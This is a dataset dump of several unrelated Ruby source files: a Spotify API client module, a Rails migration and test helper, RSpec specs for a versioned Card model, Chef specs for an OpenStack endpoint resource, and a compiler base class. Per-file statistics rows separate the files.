config.start_url = "https://bulbapedia.bulbagarden.net/wiki/List_of_Pok%C3%A9mon_by_National_Pok%C3%A9dex_number"
config.base_url = "https://bulbapedia.bulbagarden.net"
end
end
| 36.512821 | 117 | 0.775281 |
bfbec6e2389a40446727eb09c98c6402c4f79c23 | 3,098 | require 'base64'
require 'json'
require 'restclient'
module RSpotify
API_URI = 'https://api.spotify.com/v1/'
AUTHORIZE_URI = 'https://accounts.spotify.com/authorize'
TOKEN_URI = 'https://accounts.spotify.com/api/token'
VERBS = %w(get post put delete)
def self.auth_header
authorization = Base64.strict_encode64 "#{@client_id}:#{@client_secret}"
{ 'Authorization' => "Basic #{authorization}" }
end
private_class_method :auth_header
# Authenticates access to restricted data. Requires {https://developer.spotify.com/my-applications user credentials}
#
# @param client_id [String]
# @param client_secret [String]
#
# @example
# RSpotify.authenticate("<your_client_id>", "<your_client_secret>")
#
# playlist = RSpotify::Playlist.find('wizzler', '00wHcTN0zQiun4xri9pmvX')
# playlist.name #=> "Movie Soundtrack Masterpieces"
def self.authenticate(client_id, client_secret)
@client_id, @client_secret = client_id, client_secret
request_body = { grant_type: 'client_credentials' }
response = RestClient.post(TOKEN_URI, request_body, auth_header)
@client_token = JSON.parse(response)['access_token']
true
end
# Exchanges the authorization code from the {https://developer.spotify.com/web-api/authorization-guide/#authorization_code_flow Authorization Code Flow} to access and refresh tokens
#
# @param code [String] The Spotify authorization code that can be exchanged for an access token.
# @param redirect_uri [String] The URI Spotify redirected the user to after the permission grant
# @param credentials [Hash] An optional set of credentials, unless RSpotify.authenticate was used previously
#
# @return [Hash] a set of credentials
#
# @example
# # Whenever Spotify redirects the user to our application after granting permissions, we get a GET param in the form of ?code=NApCCg(...)BkWtQ
# credentials = RSpotify.exchange_code(params['code'], 'http://foo.com/spotify/login')
# user = RSpotify::User.from_credentials(credentials)
# user.name #=> "John Doe"
def self.exchange_code(code, redirect_uri, credentials={})
@client_id = credentials['client_id'] if credentials['client_id']
@client_secret = credentials['client_secret'] if credentials['client_secret']
request_body = {
grant_type: 'authorization_code',
code: code,
redirect_uri: redirect_uri,
client_id: @client_id,
client_secret: @client_secret
}
response = RestClient.post(TOKEN_URI, request_body, {'Content-Type' => 'application/json'})
return JSON.parse(response)
end
VERBS.each do |verb|
define_singleton_method verb do |path, *params|
url = API_URI + path
response = RestClient.send(verb, url, *params)
JSON.parse response unless response.empty?
end
define_singleton_method "auth_#{verb}" do |path, *params|
auth_header = { 'Authorization' => "Bearer #{@client_token}" }
params << auth_header
send(verb, path, *params)
end
end
end
| 38.725 | 183 | 0.695933 |
283717b5a71ce7102734692b4f244e2da3c367c0 | 149 | # frozen_string_literal: true
class AddNameToPartner < ActiveRecord::Migration[5.0]
def change
add_column :partners, :name, :string
end
end
| 18.625 | 53 | 0.751678 |
21a06058079194299468a86f4b5b5c3197f6e48f | 2,557 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'spec_helper'
require 'rspec/rails'
require 'pundit/rspec'
require 'capybara/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec/support/**/*.rb')].each { |f| require f }
# Checks for pending migrations before tests are run.
# If you are not using ActiveRecord, you can remove this line.
ActiveRecord::Migration.maintain_test_schema!
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
config.include Capybara::DSL
end
| 44.086207 | 86 | 0.748925 |
1cacb5f0a2adaafbaad2cce04e724e782292e256 | 8,882 | # Copyright (c) 2018 Public Library of Science
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
require 'rails_helper'
describe Card do
let(:card) do
FactoryGirl.create(
:card,
:versioned
)
end
context 'validation' do
it 'is valid' do
expect(card).to be_valid
end
it 'enforces a unique name per journal' do
journal_a = FactoryGirl.create(:journal)
journal_b = FactoryGirl.create(:journal)
FactoryGirl.create(:card, name: "Foo", journal: journal_a)
new_invalid_card = FactoryGirl.build(:card, name: "Foo", journal: journal_a)
expect(new_invalid_card).to_not be_valid
expect(new_invalid_card.errors[:name]).to be_present
new_valid_card = FactoryGirl.build(:card, name: "Foo", journal: journal_b)
expect(new_valid_card).to be_valid
end
end
describe 'create_published!' do
let(:new_card) { Card.create_published!(name: 'foo', card_task_type: FactoryGirl.create(:card_task_type)) }
it 'creates a new card with the given attributes' do
expect(new_card.name).to eq('foo')
end
it 'creates a new published card version' do
latest_version = new_card.latest_card_version
expect(latest_version).to be_published
expect(latest_version).to eq(new_card.latest_published_card_version)
expect(latest_version.history_entry).to eq("Loaded from a configuration file")
end
it 'gives the card version a piece of card content' do
expect(new_card.latest_card_version.content_root).to be_present
end
end
describe '#content_root_for_version' do
it 'returns the root card content' do
expect(card.content_root_for_version(1)).to be_present
end
it 'returns the root card content for the latest' do
expect(card.content_root_for_version(:latest)).to be_present
end
end
describe "#publish!" do
let(:card) do
FactoryGirl.create(
:card,
latest_version: 1
)
end
let!(:card_version) do
FactoryGirl.create(
:card_version,
card: card,
version: 1,
published_at: nil
)
end
it "sets the published_at on the latest version if it's unset" do
card.publish!("foo")
expect(card_version.reload.published_at).to be_present
end
it "assigns the provided history_entry to the latest card version" do
card.publish!("foo")
expect(card_version.reload.history_entry).to eq("foo")
end
it "sets the published_by when provided" do
user = FactoryGirl.create(:user)
card.publish!("foo", user)
expect(card_version.reload.published_by).to eq(user)
end
it "blows up if not invoked with a new history entry" do
expect { card.publish! }.to raise_error(ArgumentError)
end
end
describe '.find_by_class_name' do
let(:card) { FactoryGirl.create(:card, journal: nil) }
let(:card_class_name) { "A::Sample::ClassName" }
context 'with successful namespace lookup' do
before do
expect(LookupClassNamespace).to receive(:lookup_namespace)
.with(card_class_name)
.and_return(card.name)
end
it 'finds the card' do
expect(Card.find_by_class_name(card_class_name)).to eq(card)
end
end
context 'without successful namespace lookup' do
it 'returns nil' do
expect(Card.find_by_class_name(card_class_name)).to be_nil
end
end
end
describe '.find_by_class_name!' do
let(:card) { FactoryGirl.create(:card, journal: nil) }
let(:card_class_name) { "A::Sample::ClassName" }
context 'with successful namespace lookup' do
before do
expect(LookupClassNamespace).to receive(:lookup_namespace)
.with(card_class_name)
.and_return(card.name)
end
it 'finds the card' do
expect(Card.find_by_class_name!(card_class_name)).to eq(card)
end
end
context 'without successful namespace lookup' do
it 'raises an error' do
expect do
Card.find_by_class_name!(card_class_name)
end.to raise_error(ActiveRecord::RecordNotFound, /#{card_class_name}/)
end
end
end
describe "#destroy" do
context "non-draft cards" do
let(:card) { FactoryGirl.create(:card, :versioned, :locked) }
it "does not destroy" do
expect(card.destroy).to be_falsey
end
end
context "draft cards" do
let(:card) { FactoryGirl.create(:card, :versioned, :draft) }
it "destroys" do
expect(card.destroy).to be_truthy
end
end
end
context "a card with multiple versions" do
let(:card) do
FactoryGirl.create(
:card,
latest_version: 2
)
end
let!(:old_version) { FactoryGirl.create(:card_version, card: card, version: 1) }
let!(:new_version) { FactoryGirl.create(:card_version, card: card, version: 2) }
describe '#card_version' do
it 'returns the card version with the specified number' do
expect(card.card_version(1).version).to eq(1)
end
it 'returns the card version for the latest version' do
expect(card.latest_card_version.version).to eq(2)
end
end
describe '#content_for_version' do
it 'returns all card content for a given version' do
old_version.content_root.children << FactoryGirl.create(:card_content)
expect(card.content_for_version(1).count).to eq(2)
end
it 'returns all card content for the latest version' do
new_version.content_root.children << FactoryGirl.create(:card_content)
expect(card.content_for_version(:latest).count).to eq(2)
end
end
describe '#content_for_version_without_root' do
it 'returns all card content for a given version minus the root' do
old_version.content_root.children << FactoryGirl.create(:card_content)
expect(card.content_for_version_without_root(1).count).to eq(1)
expect(card.content_for_version_without_root(1).first.parent_id).to be_present
end
it 'returns all card content for the latest version minus the root' do
new_version.content_root.children << FactoryGirl.create(:card_content)
expect(card.content_for_version_without_root(:latest).count).to eq(1)
expect(card.content_for_version_without_root(:latest).first.parent_id).to be_present
end
end
end
# For now the real meat of the tests are with the XmlCardLoader
describe "#update_from_xml" do
let(:card) do
FactoryGirl.create(
:card,
:versioned
)
end
context "the card is published" do
it "has the XmlCardLoader make a new draft version" do
allow(XmlCardLoader).to receive(:new_version_from_xml_string)
expect(XmlCardLoader).to receive(:new_version_from_xml_string).with("foo", card)
card.update_from_xml("foo")
end
end
context "the card is a draft" do
it "has the XmlCardLoader replace the current draft" do
card.update(state: "draft")
card.latest_card_version.update(published_at: nil)
allow(XmlCardLoader).to receive(:replace_draft_from_xml_string)
expect(XmlCardLoader).to receive(:replace_draft_from_xml_string).with("foo", card)
card.update_from_xml("foo")
end
end
context "the card is published with changes" do
it "has the XmlCardLoader replace the current draft" do
card.update(state: "published_with_changes")
card.latest_card_version.update(published_at: nil)
allow(XmlCardLoader).to receive(:replace_draft_from_xml_string)
expect(XmlCardLoader).to receive(:replace_draft_from_xml_string).with("foo", card)
card.update_from_xml("foo")
end
end
end
end
| 33.771863 | 111 | 0.680928 |
bfd28f7a676c75acf96c55f242d84cf0fe787220 | 4,183 |
#
# Copyright:: 2016 cloudbau GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
require_relative '../libraries/openstack_endpoint'
describe 'openstackclient_test::endpoint' do
let(:chef_run) do
runner = ChefSpec::SoloRunner.new(
UBUNTU_OPTS.merge(step_into: ['openstack_endpoint'])
)
runner.converge(described_recipe)
end
let(:services_dub) do
double :services,
find: double(id: 1)
end
let(:endpoints_empty) do
double :endpoints,
create: true,
destroy: true,
find: nil
end
let(:endpoints_populated) do
double :endpoints,
create: true,
destroy: true,
find: double(id: 2)
end
context 'no endpoints defined' do
let(:connection_dub) do
double :fog_connection,
services: services_dub,
endpoints: endpoints_empty
end
before do
allow_any_instance_of(OpenstackclientCookbook::OpenstackEndpoint)
.to receive(:connection).and_return(connection_dub)
end
it do
expect(connection_dub).to receive(:endpoints)
chef_run
end
it do
expect(connection_dub).to receive(:services)
chef_run
end
%w(public internal admin).each do |interface|
it do
expect(chef_run).to write_log(
"#{interface}_endpoint for \"myservice\" doesn't exist"
)
end
it do
expect(chef_run).not_to write_log(
"#{interface}_endpoint for \"myservice\" already exists"
)
end
it do
expect(chef_run).to create_openstack_endpoint("myendpoint_#{interface}")
end
it do
expect(chef_run).to delete_openstack_endpoint("myendpoint_#{interface}")
end
it do
expect(endpoints_empty).to receive(:create)
.with(
interface: interface,
url: "http://localhost:80/#{interface}",
service_id: 1,
name: "myendpoint_#{interface}",
region: nil
)
chef_run
end
it do
expect(endpoints_empty).not_to receive(:destroy)
chef_run
end
end
end
context 'endpoints defined' do
let(:connection_dub) do
double :fog_connection,
services: services_dub,
endpoints: endpoints_populated
end
before do
allow_any_instance_of(OpenstackclientCookbook::OpenstackEndpoint)
.to receive(:connection).and_return(connection_dub)
end
it do
expect(connection_dub).to receive(:endpoints)
chef_run
end
it do
expect(connection_dub).to receive(:services)
chef_run
end
%w(public internal admin).each do |interface|
it do
expect(chef_run).not_to write_log(
"#{interface}_endpoint for \"myservice\" doesn't exist"
)
end
it do
expect(chef_run).to write_log(
"#{interface}_endpoint for \"myservice\" already exists"
)
end
it do
expect(chef_run).to create_openstack_endpoint("myendpoint_#{interface}")
end
it do
expect(chef_run).to delete_openstack_endpoint("myendpoint_#{interface}")
end
it do
expect(endpoints_populated).not_to receive(:create)
.with(
interface: interface,
url: "http://localhost:80/#{interface}",
service_id: 1,
name: "myendpoint_#{interface}",
region: nil
)
chef_run
end
it do
expect(endpoints_populated).to receive(:destroy)
.with(2)
chef_run
end
end
end
end
| 24.89881 | 80 | 0.618456 |
2896e1f2b6a87d30973d06007f7e4b2593fdb054 | 2,129 | #
# base.rb
# Copyright © 2019 Netguru S.A. All rights reserved.
#
module Highway
module Compiler
module Analyze
module Tree
module Values
# This class is a base abstract class for other classes in this
# module. You should not use it directly.
class Base
public
# Initialize an instance.
def initialize()
raise NotImplementedError.new("You must not call `#{__method__.to_s}` on `#{self.class.to_s}`.")
end
# A flat array of all segments.
#
# @return [Array<Highway::Compiler::Analyze::Tree::Segments::*>]
def flatten_segments
raise NotImplementedError.new("You must override `#{__method__.to_s}` in `#{self.class.to_s}`.")
end
# A flat array of all segments which satisty the given block.
#
# @param &block [Block] The selection block.
#
# @return [Array<Highway::Compiler::Analyze::Tree::Segments::*>]
def select_segments(&block)
flatten_segments.select(&block)
end
# The flat array of variable segments which satisfy the given block.
#
# @param &block [Block] The selection block.
#
# @return [Array<Highway::Compiler::Analyze::Tree::Segments::Variable>]
def select_variable_segments(&block)
if block_given?
select_segments { |s| s.is_a?(Segments::Variable) && block.call(s) }
else
select_segments { |s| s.is_a?(Segments::Variable) }
end
end
# The flat array of variable segments with the given scope.
#
# @param &block [Symbol] The lookup scope.
#
# @return [Array<Highway::Compiler::Analyze::Tree::Segments::Variable>]
def select_variable_segments_with_scope(scope)
select_variable_segments { |s| s.scope == scope }
end
end
end
end
end
end
end
| 31.308824 | 110 | 0.543448 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.